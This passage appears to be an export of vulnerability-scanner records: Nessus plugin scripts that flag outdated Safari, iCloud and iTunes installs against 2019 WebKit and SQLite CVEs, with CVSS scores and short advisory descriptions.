reference:\"webkit2gtk-4_0-injected-bundles-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.24.2-2.44.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-13T13:28:57", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 12.1.1 It is, therefore, affected by multiple vulnerabilities.\n\n - Multiple out-of-bound errors exist in WebKit, due to improper memory handling. An unauthenticated, remote attacker can exploit this, via specially crated web content to execute arbitrary commands. (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - An out-of-bound read error exists in WebKit due to improper memory handling. An unauthenticated, remote attacker can exploit this, via specially crafted web content to disclose memory contents. (CVE-2019-8607)", "cvss3": {}, "published": "2019-05-30T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 12.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2020-01-13T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI_12_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/125548", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125548);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/13\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\"\n );\n script_bugtraq_id(108497);\n\n script_name(english:\"macOS : Apple Safari < 12.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 12.1.1 It is, therefore,\naffected by multiple vulnerabilities.\n\n - Multiple out-of-bound errors exist in WebKit, due to improper memory handling. An unauthenticated, remote attacker \n can exploit this, via specially crated web content to execute arbitrary commands. (CVE-2019-6237, CVE-2019-8571, \n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,\n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - An out-of-bound read error exists in WebKit due to improper memory handling. An unauthenticated, remote attacker \n can exploit this, via specially crafted web content to disclose memory contents. (CVE-2019-8607)\");\n # https://lists.apple.com/archives/security-announce/2019/May/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9afc6282\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 12.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8628\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(12|13|14)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, 'macOS Sierra 10.12 / macOS High Sierra 10.13 / macOS Mojave 10.14');\n\ninstalled = get_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '12.1.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-24T14:24:18", "description": "According to its version, the iCloud application installed on the remote Windows host is prior to 7.12. It is, therefore, affected by multiple vulnerabilities:\n\n - An arbitrary code execution vulnerability exists in SQLite & WebKit due to maliciously crafted content. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2019-8600, CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - An privilege escalation vulnerability exists in SQLite due to an input validation and memory corruption issue. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2019-8577, CVE-2019-8602)\n\n - An arbitrary memory read vulnerability exists in SQLite due to improper input validation. An unauthenticated, remote attacker can exploit this to read restricted memory. (CVE-2019-8598)", "cvss3": {}, "published": "2019-06-14T00:00:00", "type": "nessus", "title": "Apple iCloud < 7.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2020-01-09T00:00:00", "cpe": ["cpe:/a:apple:icloud_for_windows"], "id": "ICLOUD_7_12.NASL", "href": "https://www.tenable.com/plugins/nessus/125878", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125878);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/09\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-8571\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\"\n );\n script_bugtraq_id(108491, 108497);\n\n script_name(english:\"Apple iCloud < 7.12 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of iCloud.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An iCloud softare installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the iCloud application installed on the remote Windows host is prior to\n7.12. It is, therefore, affected by multiple vulnerabilities:\n\n - An arbitrary code execution vulnerability exists in SQLite & \n WebKit due to maliciously crafted content. An unauthenticated, \n remote attacker can exploit this to execute arbitrary code. \n (CVE-2019-8600, CVE-2019-6237, CVE-2019-8571, CVE-2019-8583,\n CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594,\n CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611,\n CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623,\n CVE-2019-8628)\n\n - An privilege escalation vulnerability exists in SQLite due to \n an input validation and memory corruption issue. An \n unauthenticated, remote attacker can exploit this to execute \n arbitrary code. (CVE-2019-8577, CVE-2019-8602)\n\n - An arbitrary memory read vulnerability exists in SQLite due to \n improper input validation. An unauthenticated, remote attacker\n can exploit this to read restricted memory. (CVE-2019-8598)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to iCloud version 7.12 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:icloud_for_windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"icloud_installed.nasl\");\n script_require_keys(\"installed_sw/iCloud\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'iCloud';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{'fixed_version' : '7.12'}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:25:51", "description": "The version of Apple iTunes for Windows installed on the remote Windows host is prior to 12.9.5. It is, therefore, affected by multiple vulnerabilities as referenced in the HT210124 advisory.\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8598)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-07-04T00:00:00", "type": "nessus", "title": "Apple iTunes for Windows < 12.9.5 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2020-01-07T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_9_5.NASL", "href": "https://www.tenable.com/plugins/nessus/126476", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126476);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/07\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-8571\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\"\n );\n script_bugtraq_id(108491, 108497);\n script_xref(name:\"APPLE-SA\", value:\"HT210124\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n\n script_name(english:\"Apple iTunes for Windows < 12.9.5 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes for Windows on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes for Windows installed on the remote\nWindows host is prior to 12.9.5. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the HT210124 advisory.\n\n - An application may be able to gain elevated privileges\n (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary\n code execution (CVE-2019-8600)\n\n - A malicious application may be able to read restricted\n memory (CVE-2019-8598)\n\n - A malicious application may be able to elevate\n privileges (CVE-2019-8602)\n\n - Processing maliciously crafted web content may result in\n the disclosure of process memory (CVE-2019-8607)\n\n - Processing maliciously crafted web content may lead to\n arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586,\n CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n CVE-2019-8596, CVE-2019-8597, CVE-2019-8601,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610,\n CVE-2019-8611, CVE-2019-8615, CVE-2019-8619,\n CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210124\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes for Windows version 12.9.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'iTunes Version', win_local:TRUE);\nconstraints = [{'fixed_version':'12.9.5'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:25:37", "description": "The version of Apple iTunes for Windows installed on the remote Windows host is prior to 12.9.5. It is, therefore, affected by multiple vulnerabilities as referenced in the HT210124 advisory.\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8598)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-07-04T00:00:00", "type": "nessus", "title": "Apple iTunes for Windows < 12.9.5 Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2020-01-07T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_9_5_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/126475", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126475);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/07\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-8571\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\"\n );\n script_bugtraq_id(108491, 108497);\n script_xref(name:\"APPLE-SA\", value:\"HT210124\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n\n script_name(english:\"Apple iTunes for Windows < 12.9.5 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes for Windows on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes for Windows installed on the remote\nWindows host is prior to 12.9.5. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the HT210124 advisory.\n\n - An application may be able to gain elevated privileges\n (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary\n code execution (CVE-2019-8600)\n\n - A malicious application may be able to read restricted\n memory (CVE-2019-8598)\n\n - A malicious application may be able to elevate\n privileges (CVE-2019-8602)\n\n - Processing maliciously crafted web content may result in\n the disclosure of process memory (CVE-2019-8607)\n\n - Processing maliciously crafted web content may lead to\n arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586,\n CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n CVE-2019-8596, CVE-2019-8597, CVE-2019-8601,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610,\n CVE-2019-8611, CVE-2019-8615, CVE-2019-8619,\n CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210124\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes for Windows version 12.9.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"installed_sw/iTunes DAAP\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('http.inc');\ninclude('vcf.inc');\n\napp = 'iTunes DAAP';\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port);\nif (app_info.Type != 'Windows') audit(AUDIT_OS_NOT, 'Windows');\nconstraints = [{'fixed_version':'12.9.5'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:22:55", "description": "The version of Apple iOS running on the mobile device is prior to 12.3. It is, therefore, affected by multiple vulnerabilities as described in the HT210118 security advisory.\n\n - Multiple elevation of privilege vulnerabilities exist due to improper memory handling. An application can exploit this to gain elevated privileges. (CVE-2019-8593, CVE-2019-8605, CVE-2019-8574)\n\n -Multiple unspecified command execution vulnerabilities exist that allow an attacker to execute arbitrary commands, sometimes with kernel privileges. (CVE-2019-8585, CVE-2019-8613,CVE-2019-8600, CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n -An unspecified denial of service (DoS) vulnerability exists in the Kernel that allows an an attacker in a privileged position to perform a denial of service attack. (CVE-2019-8626)", "cvss3": {}, "published": "2019-05-20T00:00:00", "type": "nessus", "title": "Apple iOS < 12.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8593", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8605", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8613", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8626", "CVE-2019-8628"], "modified": "2019-05-20T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "700713.PRM", "href": "https://www.tenable.com/plugins/nnm/700713", "sourceData": "Binary data 700713.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:22:55", "description": "The version of Apple tvOS installed on the remote host is greater or equal to 12.0.0 and prior to 12.3. It is, therefore, affected by the following vulnerabilities :\n\n - An application may be able to execute arbitrary code with system privileges. (CVE-2019-8593)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution. (CVE-2019-8585)\n\n - A malicious application may be able to read restricted memory. (CVE-2019-8560)\n\n - A malicious application may be able to execute arbitrary code with system privileges. (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory. (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory. (CVE-2019-8591)\n\n - A local user may be able to modify protected parts of the file system. (CVE-2019-8568)\n\n - A malicious application may be able to gain root privileges. (CVE-2019-8637)\n\n - An application may be able to gain elevated privileges. 